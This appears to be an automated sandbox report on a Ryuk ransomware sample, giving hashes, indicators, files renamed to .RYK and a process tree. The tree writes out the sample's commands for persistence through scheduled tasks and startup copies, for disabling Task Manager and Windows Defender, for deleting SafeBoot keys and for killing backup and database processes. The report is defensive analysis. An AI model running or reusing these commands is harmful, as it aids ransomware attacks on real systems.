Analysis
-
max time kernel
47s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
09-03-2023 18:31
Static task
static1
Behavioral task
behavioral1
Sample
Ryuk86.bin.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Ryuk86.bin.exe
Resource
win10v2004-20230220-en
General
-
Target
Ryuk86.bin.exe
-
Size
767KB
-
MD5
d2e194259106bca3b42dc8690d340b59
-
SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b
-
SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
-
SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13
-
SSDEEP
12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Ryuk86.bin.exedescription ioc process File opened (read-only) \??\A: Ryuk86.bin.exe File opened (read-only) \??\R: Ryuk86.bin.exe File opened (read-only) \??\S: Ryuk86.bin.exe File opened (read-only) \??\T: Ryuk86.bin.exe File opened (read-only) \??\U: Ryuk86.bin.exe File opened (read-only) \??\X: Ryuk86.bin.exe File opened (read-only) \??\Y: Ryuk86.bin.exe File opened (read-only) \??\F: Ryuk86.bin.exe File opened (read-only) \??\Z: Ryuk86.bin.exe File opened (read-only) \??\H: Ryuk86.bin.exe File opened (read-only) \??\L: Ryuk86.bin.exe File opened (read-only) \??\N: Ryuk86.bin.exe File opened (read-only) \??\B: Ryuk86.bin.exe File opened (read-only) \??\P: Ryuk86.bin.exe File opened (read-only) \??\W: Ryuk86.bin.exe File opened (read-only) \??\G: Ryuk86.bin.exe File opened (read-only) \??\I: Ryuk86.bin.exe File opened (read-only) \??\J: Ryuk86.bin.exe File opened (read-only) \??\K: Ryuk86.bin.exe File opened (read-only) \??\M: Ryuk86.bin.exe File opened (read-only) \??\O: Ryuk86.bin.exe File opened (read-only) \??\Q: Ryuk86.bin.exe File opened (read-only) \??\V: Ryuk86.bin.exe File opened (read-only) \??\E: Ryuk86.bin.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Ryuk86.bin.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_COL.HXT.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7B.GIF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15018_.GIF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Earthy.css.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\bdcmetadataresource.xsd.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107134.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21504_.GIF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\THOCRAPI.DLL.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXEV.DLL.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADVCMP.DIC.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLED.EXE.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0216858.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\messageboxalert.ico.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\THMBNAIL.PNG.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALNDR98.POC.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\desktop.ini.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF.[[email protected]].RYK Ryuk86.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.[[email protected]].RYK Ryuk86.bin.exe -
Drops file in Windows directory 2 IoCs
Processes:
Ryuk86.bin.exedescription ioc process File created C:\Windows\RyukReadMe.txt Ryuk86.bin.exe File created C:\Windows\hrmlog1 Ryuk86.bin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 932 schtasks.exe 968 schtasks.exe 524 schtasks.exe 1320 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1544 taskkill.exe 612 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Ryuk86.bin.exepid process 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe 1348 Ryuk86.bin.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 612 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Ryuk86.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1348 wrote to memory of 1468 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1468 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1468 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1468 1348 Ryuk86.bin.exe cmd.exe PID 1468 wrote to memory of 932 1468 cmd.exe schtasks.exe PID 1468 wrote to memory of 932 1468 cmd.exe schtasks.exe PID 1468 wrote to memory of 932 1468 cmd.exe schtasks.exe PID 1468 wrote to memory of 932 1468 cmd.exe schtasks.exe PID 1348 wrote to memory of 916 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 916 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 916 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 916 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1708 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1708 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1708 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 1708 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 568 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 568 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 568 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 568 1348 Ryuk86.bin.exe cmd.exe PID 568 wrote to memory of 968 568 cmd.exe schtasks.exe PID 568 wrote to memory of 968 568 cmd.exe schtasks.exe PID 568 wrote to memory of 968 568 cmd.exe schtasks.exe PID 568 wrote to memory of 968 568 cmd.exe schtasks.exe PID 1348 wrote to memory of 472 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 472 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 472 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 472 1348 Ryuk86.bin.exe cmd.exe PID 472 wrote to memory of 1328 472 cmd.exe attrib.exe PID 472 wrote to memory of 1328 472 cmd.exe attrib.exe PID 472 wrote to memory of 1328 472 cmd.exe attrib.exe PID 472 wrote to memory of 1328 472 cmd.exe attrib.exe PID 1348 wrote to memory of 268 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 268 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 268 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 268 1348 Ryuk86.bin.exe cmd.exe PID 268 wrote to memory of 524 268 cmd.exe schtasks.exe PID 268 wrote to memory of 524 268 cmd.exe schtasks.exe PID 268 wrote to memory of 524 268 cmd.exe schtasks.exe PID 268 wrote to memory of 524 268 cmd.exe schtasks.exe PID 1348 wrote to memory of 684 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 684 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 684 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 684 1348 Ryuk86.bin.exe cmd.exe PID 684 wrote to memory of 1320 684 cmd.exe schtasks.exe PID 684 wrote to memory of 1320 684 cmd.exe schtasks.exe PID 684 wrote to memory of 1320 684 cmd.exe schtasks.exe PID 684 wrote to memory of 1320 684 cmd.exe schtasks.exe PID 1348 wrote to memory of 588 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 588 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 588 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 588 1348 Ryuk86.bin.exe cmd.exe PID 588 wrote to memory of 1240 588 cmd.exe attrib.exe PID 588 wrote to memory of 1240 588 cmd.exe attrib.exe PID 588 wrote to memory of 1240 588 cmd.exe attrib.exe PID 588 wrote to memory of 1240 588 cmd.exe attrib.exe PID 1348 wrote to memory of 984 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 984 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 984 1348 Ryuk86.bin.exe cmd.exe PID 1348 wrote to memory of 984 1348 Ryuk86.bin.exe cmd.exe PID 984 wrote to memory of 948 984 cmd.exe attrib.exe PID 984 wrote to memory of 948 984 cmd.exe attrib.exe PID 984 wrote to memory of 948 984 cmd.exe attrib.exe PID 984 wrote to memory of 948 984 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 1328 attrib.exe 1240 attrib.exe 948 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:932
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
PID:968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
PID:1328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F3⤵
- Creates scheduled task(s)
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵PID:812
-
C:\Windows\SysWOW64\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵PID:696
-
C:\Windows\SysWOW64\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
PID:604
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵PID:556
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵PID:936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵PID:1640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵PID:1728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:1156
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:768
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:1580
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:1704
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:560
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe1⤵
- Views/modifies file attributes
PID:948
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im veeam*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /t /f /im sql*1⤵PID:1248
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /im sql*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:612
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5a641bf8ac8307aad57ecab53872e67db
SHA16fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA2569383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA5127d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4
-
Filesize
1KB
MD5f69127370e1f1aede86e881dd446f6aa
SHA165298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA5125e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
-
Filesize
767KB
MD5d2e194259106bca3b42dc8690d340b59
SHA1edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA5124cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13
-
Filesize
8B
MD5bea6ddd31c498e9f4e9f6bc95923ee3e
SHA10cfd17881260146fb9417dbf9694fa6ef2211105
SHA2568b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
SHA512910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f
-
Filesize
1KB
MD5f69127370e1f1aede86e881dd446f6aa
SHA165298f80e3b97f59ea45179463ab9c5cc3ee9337
